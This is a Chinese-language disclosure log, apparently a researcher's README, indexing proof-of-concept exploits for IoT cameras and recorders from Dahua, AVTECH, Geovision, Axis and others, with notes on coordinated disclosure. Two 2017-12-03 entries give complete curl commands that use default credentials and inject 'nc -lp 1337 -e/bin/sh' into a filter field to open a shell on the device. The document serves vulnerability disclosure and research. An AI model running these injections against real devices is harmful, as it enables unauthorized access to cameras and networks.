
Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.
杂项 PoC - 物联网(不安全)设备
关于这些糟糕的(不)安全设备的内容非常值得一读: https://ipvm.com/reports/security-exploits
2021-10-19
所有功劳归于 Watchful_IP (https://watchfulip.github.io/)
https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py
2021-10-06
详情:https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt
PoC:https://github.com/mcw0/DahuaConsole
2021-09-06
两个独立的认证绕过漏洞。
由于极有可能再次发生“Dahua 大规模入侵”事件,我将保留完整披露(Full Disclosure)的细节直到 2021 年 10 月 6 日。
在此之前,强烈建议升级固件。
https://www.dahuasecurity.com/support/cybersecurity/details/957
2020-05-09
https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py
2020-02-29
https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py
2020-02-15
本周已与 Dahua PSIRT 建立联系,并已提供涉及 23 家不同云服务商的详细信息、PoC 和证据。我还将遵循 Google Zero 的新试行《政策与披露:2020 年版》(因为这对我来说是合理的),也就是说我将在 90 天后发布,无论 Dahua 是否会在 09.05.2020 19:00 UTC(2020 年 5 月 9 日 19:00 UTC)之前或之后发布更新。
Dahua,请在此日期之前修复问题并提供更新……
参考:Google Zero《政策与披露:2020 年版》:https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html
2020-02-10
我刚刚向 Dahua PSIRT 披露了 Dahua SDK 的凭据泄露问题(最终以明文形式出现),看看他们会如何对待这一信息。当涉及 20 多家不同的云服务商时,情况相当糟糕……从今天起 90 天倒计时开始。
2020-01-20
已创建新仓库,我计划在其中发布一些工具。
首发:Dahua-JSON-Debug-Console-v2.py
2019-10-06(旧内容)
匿名检测 Axis 设备的型号和固件版本(1998 - 2019)。
https://github.com/mcw0/PoC/blob/master/axis-detect.py
2019-08-20
https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py
2019-08-06
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
所有技术细节连同 Python PoC 将于 2019 年 8 月 20 日发布在这里。
2019-05-15
多个栈溢出、RCE、明文用户名/密码泄露等问题
https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py
2019-04-10
该脚本将使用 Dahua 'DHIP' P2P 二进制协议,该协议运行在常规 HTTP/HTTPS 端口和 TCP/5000 上。
将使用 JSON 连接到 Dahua 设备内部的'调试控制台'(与之前在 TCP/6789 上的调试类型相同)。
https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py
玩得开心,bashis
2019-01-23
大家好,很久没有发布内容了……
我依然在继续我的研究,但最新消息是,我也在尝试与 VDOO (https://www.vdoo.com/) 合作进行供应商管理,这不幸地在某种程度上推迟了我的完整披露进程……
总之,接下来在我的 GitHub 上会有几项有趣的研究以完整披露的形式发布。
与 VDOO 合作后,我可以做我喜欢做的工作,而不必浪费时间与那些(不想 | 不理解 | 想忽视 | 想拖延 | 诸如此类)的供应商周旋。
最近的是关于 Reolink (https://reolink.com/) 的一些内容,你可以在这里找到:https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/。
2018-06-18
AVTECH {DVR/NVR/IPC} 堆溢出、IPCP API、RCE
https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt
https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py
2018-06-03
Reolink {IPC} RCE(已认证)
https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py
2018-04-09
Shenzhen TVT Digital Technology Co. Ltd 及 OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
2018-03-05
AVTECH {DVR/NVR/IPC} 已认证 RCE
https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py
2018-02-01
Geovision Inc. IP 摄像机/视频/门禁系统 多个远程命令执行 - 多个栈溢出 - 双重释放 - 未授权访问 https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
Geovision Inc. IP 摄像机与视频服务器远程命令执行 PoC https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
2018-01-22
Herospeed TelnetSwitch 守护进程运行在 TCP/787 上,用于允许启用 telnetd。 其中一个小小的栈溢出漏洞使我们能够覆盖动态生成的密码并启用 telnetd。 https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py
2018-01-15
一个小的 OpenSSL 封装,用于在 Foscam IPC 固件镜像上循环测试不同的加密密钥/摘要和加密算法。 https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py
对各类 Foscam IPC 二进制文件和库中的字符串/登录名/密码/加密密钥进行反混淆 https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py
2017-12-22
https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt
2017-12-14
https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt
2017-12-05
https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c
2017-12-03
// 启用 'IP 过滤器'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// 添加到 'IP 过滤器' 并执行
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// 禁用 'IP 过滤器'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// 从 'IP 过滤器' 中移除
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
2017-12-03
// 启用 'IP 过滤器'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// 添加到 'IP 过滤器' 并执行
curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// 禁用 'IP 过滤器'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// 从 'IP 过滤器' 中移除
curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
注意:很确定还有其他 OEM 厂商存在相同问题。
2017-12-01
Axis Communications MPQT/PACS 堆溢出与信息泄露 https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
2017-11-13
反向 stunnel TLSv1 隐私 shell https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt
2017-11-13
Vivotek IP 摄像机 - 远程栈溢出 https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
2017-10-29
Uniview RCE 与配置导出 PoC https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt
2017-10-19
2016 年第三季度一次被遗忘的模糊测试,它导致了 RCE(PoC:远程反向连接 shell)并可远程读取 /etc/shadow。 已报告给 Axis 并于 2016 年第三季度修复,现在仍发布在这里,因为它可能是一个很好的提示。 https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE
2017-10-17
在 Dahua 中启用/禁用 Telnetd(适用于较新的固件版本) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py
2017-05-03
Dahua 后门 PoC 的公开再发布 https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
2017-03-20
根据我新获得的信息,市面上存在漏洞的设备数量惊人,超过 100 万台 Dahua / OEM 设备,这些信息来自 NSFOCUS 的一份报告以及我在 shodan.io 上的研究。
基于这些信息,我将不会像之前所说的那样在 4 月 5 日公开发布 Python PoC,因为该 PoC 已经过 IPVM 和其他独立安全研究人员的验证,已无必要发布。
不过,如果有需要,我愿意与认真的安全研究人员分享该 PoC。请通过邮件直接联系我(不要在公开列表中),并清楚地说明你的身份,以免我把你误认为乞丐而不予理会。
NSFOCUS 报告:http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/
/bashis
你注意到 Dahua 补丁上的日期和时间戳了吗? 看看这些来自以下链接的截图: http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
列表中不仅有 NVR/DVR/IPC/HDCVI
对讲系统也在其中,VTO2000A 已得到确认 http://www1.dahuasecurity.com/au/products/vto2000a-762.html